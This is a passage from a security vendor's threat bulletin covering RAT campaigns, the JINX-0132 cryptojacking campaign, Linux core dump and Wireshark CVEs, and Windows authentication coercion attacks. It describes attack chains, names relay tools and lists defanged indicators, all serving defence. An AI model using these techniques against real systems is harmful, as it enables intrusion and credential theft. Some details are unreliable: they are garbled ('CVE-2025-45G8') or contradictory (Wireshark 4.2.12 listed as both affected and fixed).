phrases, and private keys.

Mitigation/Workaround:

  • Educate users to avoid downloading network tools or wallet software from untrusted sources.
  • Monitor for suspicious cron job modifications and unexpected scheduled tasks, especially on Linux systems.
  • Deploy endpoint protection capable of detecting in-memory malware and reverse shell activity.
  • Patch Chaos RAT admin panels to the latest version to address known vulnerabilities.

 

  • Regularly audit systems for unauthorized software and monitor for signs of credential theft or clipboard abuse.

References:

https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html


  • NetSupport RAT Delivered via Fake DocuSign and Gitcode Sites Using Multi-Stage PowerShell Attacks

A new campaign is leveraging counterfeit DocuSign and Gitcode websites to distribute NetSupport RAT through a sophisticated, multi-stage PowerShell attack chain. The operation relies on social engineering to trick users into executing malicious scripts,

ultimately granting attackers remote access to compromised systems.

Key Details:

  • Malware: NetSupport RAT (legitimate remote administration tool abused for malicious purposes)
  • Delivery Method:

    • Fake DocuSign and Gitcode sites prompt users to complete a CAPTCHA or follow instructions, which covertly copies an obfuscated PowerShell command to the clipboard (clipboard poisoning).
    • Victims are instructed to paste and run the script via the Windows Run dialog, initiating the infection chain.
  • Attack Flow:

    • Initial PowerShell script downloads a secondary script from an external server (e.g., tradingviewtool[.]com).
    • Subsequent scripts fetch additional payloads, including a persistence mechanism (“wbdims.exe”) and a ZIP archive containing “jp2launcher.exe.”
    • The final stage executes NetSupport RAT, granting attackers remote control.
  • Evasion Techniques:

    • Multi-stage scripting to bypass detection and complicate analysis
    • Use of legitimate tools (NetSupport Manager) to blend in with normal administrative activity

 

  • ClickFix-style CAPTCHAs and social engineering to increase user compliance

Associated Infrastructure:

  • Malicious domains include:
    • tradingviewtool[.]com
    • docusign.sa[.]com

Mitigation/Workaround:

  • Educate users to avoid running scripts or commands from untrusted websites, especially those received via email or social media.
  • Monitor for clipboard manipulation and suspicious PowerShell activity on endpoints.
  • Block access to known malicious domains and monitor for connections to suspicious infrastructure.
  • Deploy endpoint protection with behavioral analysis to detect multi-stage script execution and RAT deployment.
  • Regularly review and restrict the use of legitimate remote administration tools within the environment.

References:

https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html

 

1G. Cryptojacking Canpaign Exploits DevOps APIs and Open WebUI Systens

A new cryptojacking campaign, tracked as JINX-0132, is targeting publicly accessible

DevOps infrastructure—including Docker, Gitea, HashiCorp Consul, and Nomad servers— to deploy cryptocurrency miners. Attackers are leveraging misconfigurations and known vulnerabilities, using off-the-shelf tools from GitHub to evade attribution and detection.

Key Details:

  • Targets: Publicly exposed Docker, Gitea, Consul, Nomad, and Open WebUI systems
  • Attack Methods:

    • Exploits Docker API to spin up containers running XMRig miners

 

  • Leverages Gitea misconfigurations (e.g., INSTALL_LOCK=false, RCE via git hooks)
  • Abuses Consul’s service registration and health checks for code execution
  • Exploits Nomad’s insecure default API to create jobs that download and run XMRig miners
  • Uses Open WebUI’s plugin system to upload and execute malicious Python scripts
  • Payloads:

    • XMRig and T-Rex cryptocurrency miners
    • Java-based loaders and infostealers (on Windows)
    • Linux persistence via systemd services and process hiding libraries (processhider, argvhider)
    • Windows infostealer targeting Discord and Chrome wallet extensions

Observed Infrastructure:

  • Downloaded tools and payloads directly from GitHub repositories
  • C2 and payload hosting via Discord webhooks and IP 185.208.159[.]155

Mitigation/Workaround:

  • Audit and secure all DevOps and cloud management interfaces; restrict public access
  • Apply security patches and enforce strong authentication for Docker, Gitea, Consul, Nomad, and Open WebUI
  • Monitor for unauthorized container creation, suspicious jobs, or plugin uploads
  • Use process monitoring to detect hidden mining activity and infostealer behavior
  • Remove unnecessary internet exposure for all management and training systems
  • Educate teams about the risks of misconfiguration and the importance of regular security reviews

References:

https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html



  • Linux Core Dunp Flaws Enable Password Hash Theft in Ubuntu, RHEL, and Fedora

Two newly disclosed vulnerabilities in Linux core dump handlers—apport (Ubuntu) and systemd-coredump (RHEL, Fedora)—could allow local attackers to extract sensitive information, including password hashes, from privileged process memory. These race condition bugs, tracked as CVE-2025-5054 and CVE-2025-4598, highlight the risks of improper core dump handling in multi-user environments.

Key Details:

  • CVE-2025-5054 (CVSS 4.7):
    • Affects Canonical apport up to 2.32.0
    • Race condition allows a local attacker to exploit PID reuse and Linux namespaces to access core dumps from privileged processes
  • CVE-2025-45G8 (CVSS 4.7):

    • Affects  systemd-coredump
    • Attackers can force a SUID process to crash, then quickly replace it with a non-SUID binary using the same PID, gaining access to the original core dump and potentially reading sensitive data such as /etc/shadow password hashes

Attack Scenario:

  • Exploiting these flaws requires local access and the ability to win a race condition, but successful attacks can expose password hashes, encryption keys, or other

confidential data from core dumps.

Inpacted Systens:

  • Ubuntu (apport)
  • RHEL, Fedora (systemd-coredump)
  • Debian is not affected by CVE-2025-4598 by default unless systemd-coredump is manually installed
  • Amazon Linux and Gentoo have issued similar advisories

Mitigation/Workaround:

 

  • Apply security updates for apport and systemd-coredump as soon as available
  • As an immediate mitigation, disable core dumps for SUID binaries by running:
  • echo 0 > /proc/sys/fs/suid_dumpable

(Note: This will prevent crash analysis for SUID binaries but blocks the attack vector.)

  • Enforce strict access controls and monitor for suspicious local activity
  • Regularly audit system configurations and restrict unnecessary local user accounts

References:

https://thehackernews.com/2025/05/new-linux-flaws-allow-password-hash.html


  • Wireshark Vulnerability Enables DoS via Malicious Packet Injection (CVE-2025- 5601)

A critical vulnerability in Wireshark, the widely used network protocol analyzer, could allow attackers to trigger denial-of-service (DoS) attacks by injecting malformed packets or

distributing corrupted capture files. The flaw, tracked as CVE-2025-5601 (wnpa-sec-2025- 02, CVSS 7.8), affects millions of users and has significant implications for organizations relying on Wireshark for network monitoring and incident response.

Key Details:

  • CVE: CVE-2025-5601
  • Severity: High (CVSS 7.8)
  • Vulnerability Type: Buffer overflow (CWE-120) in the column utility module
  • Affected Versions:

    • Wireshark 4.4.0 through 4.4.6
    • Wireshark 4.2.0 through 4.2.12
  • Attack Vectors:

    • Injection of malformed packets into monitored network traffic
    • Distribution of malicious packet capture files to Wireshark users

Inpact:

 

  • Successful exploitation causes Wireshark to crash, disrupting network analysis and monitoring operations
  • Potential to impact real-time security monitoring and incident response in enterprise environments

Mitigation/Workaround:

  • Upgrade immediately to Wireshark version 4.4.7 or 4.2.12, which contain patches for this vulnerability
  • Only open capture files from trusted sources
  • Limit packet capture operations to trusted network segments
  • Implement network segmentation to reduce exposure
  • Review and update network monitoring security protocols regularly

References:

https://www.wireshark.org/security/wnpa-sec-2025-02.html https://nvd.nist.gov/vuln/detail/CVE-2025-5601


  • Windows Authentication Coercion Attacks Threaten Enterprise Networks

Authentication coercion attacks remain a significant risk to enterprise Active Directory environments, enabling attackers with limited privileges to escalate to domain-wide administrative access. Despite Microsoft’s ongoing security enhancements, these

techniques continue to evolve and exploit gaps in Windows authentication protocols and service configurations.

Key Details:

  • Attack Techniques:
    • Abuse of Remote Procedure Call (RPC) interfaces such as MS-RPRN (PrinterBug), MS-EFSR (PetitPotam), MS-DFSNM (DFS Coercion), and MS- WSP (WSP Coercion)
    • Coercion of Windows computer accounts to authenticate with attacker- controlled systems, enabling credential relay and privilege escalation
    • Exploitation of legitimate Windows services, including printer management and encrypted file services, to trigger authentication flows

 

  • Recent Developnents:

    • Attack tools (e.g., ntlmrelayx.py) have been updated to bypass Microsoft’s mitigations by leveraging new RPC server capabilities
    • Automated modules (e.g., NetExec efsr_spray) can activate vulnerable services and exploit SMB shares, including printer queues
    • HTTP-based coercion remains viable via the WebClient service and

.searchConnector-ms files on accessible shares

  • Microsoft Protections:

    • Extended Protection for Authentication (EPA), LDAP channel binding, and SMB signing are now enabled by default on new Windows Server and

Windows 11 installations

  • Upgraded systems may retain legacy configurations, leaving them exposed
  • Some mitigations, such as disabling unencrypted AD CS Web Enrollment APIs, are only active on fresh installs

Inpact:

  • Attackers can impersonate computer accounts, abuse S4U2Self and Resource- Based Constrained Delegation (RBCD), and potentially gain DCSync privileges for full domain compromise
  • Kerberos relaying attacks are expected to become more prominent as NTLM is phased out

Mitigation/Workaround:

  • Enforce SMB signing and LDAP channel binding across all Windows systems, not just new installations
  • Audit and disable unnecessary services, especially WebClient, on all endpoints
  • Regularly review and update group policies to ensure modern authentication protections are in place
  • Monitor for suspicious authentication attempts and RPC activity, particularly involving computer accounts
  • Educate IT teams on evolving coercion and relay attack techniques and ensure prompt application of security updates

 

References:

https://cybersecuritynews.com/windows-authentication-coercion-attacks/

 

Ready to get started?

Contact us to arrange a half day
Managed SOC and XDR workshop in Dubai

Ready to get started?

Contact us to arrange a half day Managed SOC and XDR workshop in Dubai

© 2025 HawkEye – Managed CSOC and XDR powered by DTS Solution. All Rights Reserved.
This is a staging environment